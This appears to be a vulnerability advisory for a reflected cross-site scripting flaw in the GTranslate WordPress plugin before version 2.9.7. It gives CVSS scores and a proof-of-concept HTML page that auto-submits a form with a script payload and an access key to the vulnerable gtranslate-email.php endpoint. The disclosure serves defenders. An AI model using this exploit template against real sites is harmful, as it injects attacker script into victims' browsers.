JrXnmWPEX-ID:90067336-C039-4CBE-AA9F-5EAB5D1E1C3DGTranslate < 2.9.7 - Reflected Cross-Site Scripting
4.7 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:N/C:N/I:P/A:N
The plugin does not sanitise and escape the body parameter in the url_addon/gtranslate-email.php file before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. Note: exploitation of the issue requires knowledge of the NONCE_SALT and NONCE_KEY
<html>
<body>
<form action="https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate-email.php?glang=e1n" id="hack" method="POST">
<input type="hidden" name="body" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="access_key" value="b4a0efbacac60a7d20cb891f5d656a3f" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
Related
4.7 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
2.6 Low
CVSS2
Access Vector
NETWORK
Access Complexity
HIGH
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:H/Au:N/C:N/I:P/A:N